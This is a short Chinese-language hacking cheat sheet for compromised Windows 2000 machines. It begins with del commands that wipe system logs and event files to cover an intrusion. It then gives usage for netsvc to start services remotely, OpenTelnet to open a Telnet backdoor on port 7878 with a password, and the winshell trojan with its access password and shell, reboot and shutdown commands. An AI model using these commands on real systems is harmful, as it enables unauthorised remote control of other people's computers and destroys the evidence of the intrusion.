扫尾:
del C:/winnt/system32/logfiles/*.*
del C:/winnt/ssytem32/config/*.evt
del C:/winnt/system32/dtclog/*.*
del C:/winnt/system32/*.log
del C:/winnt/system32/*.txt
del C:/winnt/*.txt
del C:/winnt/*.log
一、netsvc.exe
下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:
netsvc /list //IP地址
netsvc schedule //IP地址 /query
netsvc //IP地址 schedule /start
二、OpenTelnet.exe
远程启动主机的Telnet服务,并绑定端口到7878,例如:
OpenTelnet //IP地址 用户名 密码 1 7878
然后就可以telnet到主机的7878端口,进入DOS方式下:
telnet IP地址 7878
三、winshell.exe
一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD后,可打下面的命令:
p Path (查看winshell主程序的路径信息)
b reBoot (重新启动机器)
d shutDown (关闭机器)
s Shell (执行后你就会看到可爱的“C:/”)
x eXit (退出本次登录会话,此命令并不终止winshell的运行)